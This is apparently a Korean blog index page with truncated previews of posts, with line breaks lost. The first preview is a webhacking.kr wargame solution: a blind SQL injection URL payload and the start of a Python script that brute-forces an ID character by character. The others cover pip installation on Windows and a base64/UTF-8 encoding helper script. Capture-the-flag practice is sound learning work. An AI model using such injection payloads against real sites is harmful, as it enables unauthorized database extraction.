web6 http://webhacking.kr/challenge/web/web-09/index.php?no=if(substr(id,1,15)like(0x5f5f5f5f5f5f5f5f5f5f5f),3,0) import requests f=open("ID_result","wb")key=""site="http://webhacking.kr/challenge/web/web-09/index.php"header={'Cookie':'PHPSESSID='}for j in range(1,15):for i in range(30,126):if chr(i)=='%' or chr(i)=='_' : continuesite="http://webhacking.kr/challenge/web/web-09/index.php"site+="?no=if.. 더보기 Pip 설치 https://pypi.python.org/pypi/setuptools/1.0#windows다운 python easy_install.py buildpython easy_install.py installPATH 적용, setxC:\pythonxx\Scripts easy_install pippip install xxxpip help 더보기 Python ksg_code.py # -*- coding: cp949 -*-import md5import os,sys,timeimport requestsimport urllibimport hashlibfrom base64 import b64encode, b64decode def kbase64(code): print("- - - - - - - - - Plain & Reverse Code - - - - - - - - -") print("CODE is : "+code) print("Encode base64 : "+b64encode(code)) try: print("Decode base64 : "+b64decode(code)) except: print("!....... Base64 Decode Error") def kUTF8(code): pri.. 더보기 이전 1 ··· 5 6 7 8 9 다음